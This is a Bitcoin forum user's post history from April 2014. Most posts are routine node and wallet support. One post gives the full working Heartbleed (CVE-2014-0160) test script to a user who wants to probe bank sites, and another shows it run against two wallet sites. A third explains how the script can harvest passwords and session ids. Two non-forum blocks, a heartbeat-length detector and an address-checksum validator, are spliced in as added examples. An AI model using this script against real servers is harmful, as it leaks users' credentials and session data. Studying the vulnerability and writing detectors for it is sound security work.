Bitcoin Forum
1261  Bitcoin / Bitcoin Technical Support / Re: Problems with the linearize.py script on: April 15, 2014, 04:57:24 PM
linearize.py gets blockchain data from bitcoin core using JSON-RPC calls. it does not read it from disk.
1262  Bitcoin / Bitcoin Technical Support / Re: Problems with the linearize.py script on: April 15, 2014, 04:08:55 PM
it should be pretty obvious
Quote
socket.error: [Errno 111] Connection refused

it probably means you don't have server=1 in bitcoin.conf (since you're running bitcoin-qt rather than bitcoind)
1263  Other / Meta / Re: A Mod was bored i guess. on: April 15, 2014, 04:05:50 AM
One word posts are sometimes fine. It really has to do with context, as to whether it is a complete answer/thought in reply. For example

OP: Hey guys! I'm here looking for a 10 BTC loan, I have no credentials, no reason to pay you back, and no trust, anyone want to give me a loan?

You: No

In this situation, you are directly responding and giving a straightforward on topic answer in one word.
[...]
I would like to disagree. If you're rejecting an offer, you don't need to reply because the lack of a reply constitutes a rejection of the offer.
1264  Bitcoin / Bitcoin Technical Support / Re: Problems running a node on VPS on: April 14, 2014, 08:59:32 PM
you can try running with -disablewallet to decrease memory usage.
1265  Bitcoin / Bitcoin Technical Support / Re: Wallet.dat Which coin? on: April 14, 2014, 08:16:21 PM
this only works on the assumption that txids don't change when you swap coins:
1. open wallet in litecoin (for scrypt) and bitcoin (for sha256), and note any txids
2. look for those txids in various block explorers.
1266  Economy / Service Discussion / Re: market research - amazon 10-15% discount on: April 14, 2014, 05:13:56 PM
You can already get amazon gift cards for up to 20% off on this forum. Also, you might want to look into this: http://purse.io/
1267  Other / Meta / Re: heartbleed & bitcointalk. on: April 14, 2014, 03:52:18 AM
now you're being disingenuous. the passwords aren't stored in server memory. the passwords aren't stored anywhere, because they're hashed + salted. the most that can be stolen are the hashes.

You're mistaken. After OpenSSL decrypts data it receives from the client it temporarily stores it in RAM. You can use heartbleed to get the POST data or part of it when a user logs in if you can time it right. The POST data of course contains the password in plaintext, the hashing is done server-side.

It is difficult to time it right but it does work. However it is incredibly easy to steal session ids using heartbleed as the session id is sent every time a user views a page. An attacker can then use that session id to login as the user.
I stand corrected.
1268  Other / Meta / Re: heartbleed & bitcointalk. on: April 14, 2014, 02:27:59 AM
ummm I highly advise you look into security issues a bit more next time.
I'm not trying to be a dick but a 3rd party could basically see what was in your server's memory... you understand that right ? If a user logged in, a 3rd party could get lucky and see that information. A 3rd party did NOT need the private key to see the unencrypted data.......

To run the exploit you simply had to download the vulnerability checking script written in python and add an extra line to print the 64k worth of data. It was so simple even I was able to get it working and I am in no way a programmer, security expert or developer etc... ( To confirm I never ran the exploit against this site.. I assumed the software was so old there would be no point even bothering to test)

the following scenario was proven to work on many many vulnerable servers.

Alice lives in Australia and logs into her server in the USA via browser/HTTPS
Bob lives in the UK and ran the exploit and the timing was just right, Alice had just logged in
and Bob got back 64k of unencrypted data, which contained Alice's password.

This attack did NOT involve MITM or anything like that... you could basically just keep getting 64k of data from the server's memory.. sometimes it might be posts, useless crap and obviously very occasionally you might get lucky and get passwords. But you DID NOT need to be in the path of the user or server... that is why this was so critical and every other website was concerned and advised people to change passwords, after it is fixed.

How do you know someone wasn't doing this exploit for months, but it only went public a few days ago ? Chances are they weren't, but how do you know.


The fact you don't think it's necessary to change passwords now is very very scary.

You should have a huge alert telling users to change their passwords, as you did with the bitcoin client update.


Seriously.. do you just not give a shit about the users' security?
You only seem concerned with generating revenue from advertisements.


now you're being disingenuous. the passwords aren't stored in server memory. the passwords aren't stored anywhere, because they're hashed + salted. the most that can be stolen are the hashes.
1269  Other / Meta / Re: The "delete" button should leave a stub behind on: April 14, 2014, 02:13:39 AM
(Depending on the jurisdiction, there may be legal requirements to keep a copy of the contents, e.g. in case of libel or other crime; but in that case the copy must be saved in such a way that not even the admins can read it without judicial order.)
that's impossible to implement
1270  Economy / Service Discussion / Re: heartbleed vulnerability of bitaddress.org and brainwallet.org on: April 14, 2014, 02:11:10 AM
grue,
This is something I do not know how to do, send those pings.
Is this something you do on the command line?
All I recognize from your post is "py"
is this python code?
Please explain.  I would like to be able to run tests on the websites of banks where I have accounts and other websites whose security is important to me.

it's a heartbleed demonstration script in python. since I forgot where I got it, and the header says it's public domain, I'll post it here.
Code:
#!/usr/bin/env python2

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS')
options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output')

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                 
''')

hb = h2bin('''
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print

def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
       

def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False

        if typ == 24:
            print 'Received heartbeat response:'
            hexdump(pay)
            if len(pay) > 3:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True

        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False

def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    sys.stdout.flush()
    s.connect((args[0], opts.port))

    if opts.starttls:
        re = s.recv(4096)
        if opts.debug: print re
        s.send('ehlo starttlstest\n')
        re = s.recv(1024)
        if opts.debug: print re
        if not 'STARTTLS' in re:
            if opts.debug: print re
            print 'STARTTLS not supported...'
            sys.exit(0)
        s.send('starttls\n')
        re = s.recv(1024)
   
    print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    print 'Waiting for Server Hello...'
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break

    print 'Sending heartbeat request...'
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)

if __name__ == '__main__':
    main()
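The `hb` record in the script above claims a 0x4000-byte heartbeat payload inside a 3-byte record, which is the mismatch the fix for CVE-2014-0160 rejects. As an added example (Python 3, not part of the original post and not OpenSSL's code), this parses plaintext TLS records and applies that length check; the function names and the well-formed sample record are constructed for illustration.

```python
import struct

HEARTBEAT = 24      # TLS record content type for heartbeat (RFC 6520)
MIN_PADDING = 16    # RFC 6520 requires at least 16 bytes of padding

def parse_records(stream):
    """Yield (content_type, version, fragment) for each complete TLS record."""
    off = 0
    while off + 5 <= len(stream):
        ctype, ver, length = struct.unpack('>BHH', stream[off:off + 5])
        frag = stream[off + 5:off + 5 + length]
        if len(frag) < length:
            break  # truncated capture, stop parsing
        yield ctype, ver, frag
        off += 5 + length

def classify_heartbeat(frag):
    """Return (verdict, claimed_payload_length) for one plaintext heartbeat."""
    if len(frag) < 3:
        return ('discard', None)  # cannot even hold type + payload_length
    _hb_type, claimed = struct.unpack('>BH', frag[:3])
    # type(1) + payload_length(2) + payload + padding must fit inside the
    # record that actually arrived; otherwise a reply would read past it.
    if 1 + 2 + claimed + MIN_PADDING > len(frag):
        return ('discard', claimed)
    return ('ok', claimed)

def scan(stream):
    """List (verdict, claimed_length, fragment_length) per heartbeat record."""
    return [classify_heartbeat(frag) + (len(frag),)
            for ctype, _ver, frag in parse_records(stream)
            if ctype == HEARTBEAT]

# The heartbeat record from the script on this page.
PAGE_HB = bytes.fromhex('18 03 02 00 03 01 40 00')
# Constructed well-formed request: 4-byte payload plus 16 bytes of padding.
_frag = b'\x01' + struct.pack('>H', 4) + b'ping' + b'\x00' * MIN_PADDING
GOOD_HB = b'\x18\x03\x02' + struct.pack('>H', len(_frag)) + _frag

if __name__ == '__main__':
    # Only plaintext records can be inspected this way; after the handshake
    # the fragment is ciphertext and these fields are not visible on the wire.
    for verdict, claimed, have in scan(PAGE_HB + GOOD_HB):
        print('%-7s claimed=%s fragment=%d' % (verdict, claimed, have))
```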
1271  Economy / Service Discussion / Re: heartbleed vulnerability of bitaddress.org and brainwallet.org on: April 14, 2014, 01:23:45 AM
both are not vulnerable.

Code:
root@www:~# ./hb-test.py www.bitaddress.org
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0301, length = 81
 ... received message: type = 22, ver = 0301, length = 3641
 ... received message: type = 22, ver = 0301, length = 525
 ... received message: type = 22, ver = 0301, length = 4
Sending heartbeat request...
 ... received message: type = 21, ver = 0302, length = 2
Received alert:
  0000: 02 46                                            .F

Server returned error, likely not vulnerable


Code:
root@www:~# ./hb-test.py www.brainwallet.org
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 3005
 ... received message: type = 22, ver = 0302, length = 331
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
Unexpected EOF receiving record header - server closed connection
No heartbeat response received, server likely not vulnerable
1272  Economy / Digital goods / Re: [WTB] Buying Amazon.com Gift Card on: April 13, 2014, 11:13:00 PM
i have a $5 amazon gift code. I'll sell it for $2 in BTC.
sorry, I don't want to transact in such low quantities.
1273  Bitcoin / Development & Technical Discussion / Re: Simple adjustment to prevent mining pools on: April 13, 2014, 09:21:11 PM
luke-jr already made a similar proposal using getblocktemplate, where miners decide which transactions are to be included.

Mining Pools are not bad and do not need to be prevented.
1274  Bitcoin / Bitcoin Technical Support / Re: "Incorrect or no genesis block found. Wrong datadir for network?" on: April 13, 2014, 09:12:41 PM
Bummer, I was hoping to not have to resync...you sure this is the only solution?
you can speed up the sync process by using the bootstrap torrent.
1275  Bitcoin / Bitcoin Technical Support / Re: upgraded to v0.9.1 and "bitcoin-qt -conf=..." on win7 stops working on: April 13, 2014, 03:53:17 AM
you can't set datadir from a .conf file.
1276  Bitcoin / Bitcoin Technical Support / Re: Is there a way to tesy my wallet without coins? on: April 11, 2014, 11:11:26 PM
i want to test my wallet
test as in? checking your balance? checking whether it's corrupt?

You won't lose any personal files it said.
Don't worry trust our crappy products it said.
to be fair, the prompt says:
Quote
System Restore does not affect personal files, such as e-mail, documents, or photos
1277  Bitcoin / Bitcoin Technical Support / Re: Checksum does not validate on: April 09, 2014, 10:20:13 PM
validateaddress 1MYpNKj25HRBFpv22YpuZsuz2zZHKBLUu
{
"isvalid" : false
}

address decodes to 00010966776006953D5567439E5E39F86A0D273BEED61967F6. if you do the SHA checksum, it indeed does not match.
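The check `validateaddress` applies to a legacy address is Base58Check: decode the string, then compare its last four bytes with the first four bytes of a double SHA-256 over the rest. As an added example (Python 3, not Bitcoin Core's code and not from the post), run on the address quoted above; the genesis-block address serves as a known-good sample, and the function names are made up for illustration.

```python
import hashlib

ALPHABET = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'

def b58decode(s):
    """Decode a Base58 string to bytes; each leading '1' is one zero byte."""
    n = 0
    for ch in s:
        n = n * 58 + ALPHABET.index(ch)  # ValueError if ch is not Base58
    body = n.to_bytes((n.bit_length() + 7) // 8, 'big')
    pad = len(s) - len(s.lstrip('1'))
    return b'\x00' * pad + body

def check_address(addr):
    """Validate a legacy address: version(1) + hash160(20) + checksum(4)."""
    try:
        raw = b58decode(addr)
    except ValueError:
        return {'valid': False, 'reason': 'character outside Base58 alphabet'}
    if len(raw) != 25:
        return {'valid': False,
                'reason': 'decoded to %d bytes, expected 25' % len(raw)}
    payload, checksum = raw[:-4], raw[-4:]
    expected = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    return {'valid': checksum == expected,
            'version': payload[0],
            'hash160': payload[1:].hex(),
            'checksum': checksum.hex(),     # what the address carries
            'expected': expected.hex()}     # what the payload hashes to

PAGE_ADDR = '1MYpNKj25HRBFpv22YpuZsuz2zZHKBLUu'   # address from the post
GENESIS = '1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa'    # known-good sample

if __name__ == '__main__':
    for a in (PAGE_ADDR, GENESIS):
        print(a, check_address(a))
```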
1278  Bitcoin / Bitcoin Discussion / Re: bitcoin core updated to 0.9.1 on: April 09, 2014, 04:00:49 AM
oh look, this sort of fearmongering again. On bitcoin-qt, you're not compromised unless you clicked a bitcoin payment link.

Change ALL YOUR PASSWORDS on banking systems, gmail, FB, this forum, all https
what if i told you that all of the major browsers do not use openssl? chrome and firefox use NSS, and microsoft uses their own closed source solution. What if I also told you that the vulnerability does not include code injection, so unless you entered passwords into an openssl application, you're safe.
1279  Bitcoin / Bitcoin Technical Support / Re: Private Key Importing on: April 08, 2014, 07:04:06 PM
Thanks for the reply. Before I change my importing scheme, do you have a rough estimate of the import speed increase using pywallet. If it takes 8-10 minutes using bitcoind, do you have a rough estimate of how long it will take for pywallet... 5 minutes? Also, if I stay using bitcoind, can I upgrade my hardware to increase speed? Thanks again!
I remember there was a topic that discusses the time of pywallet vs json-rpc commands, and pywallet was considerably faster but I don't have the link. The limiting factor when importing is probably the hard drive because of the wallet database transactions (assuming you're not rescanning after every key imported).
1280  Bitcoin / Bitcoin Technical Support / Re: Private Key Importing on: April 08, 2014, 02:14:05 PM
Some users report slowness when bitcoind is holding 200000+ keys. The fastest way to import is to use pywallet.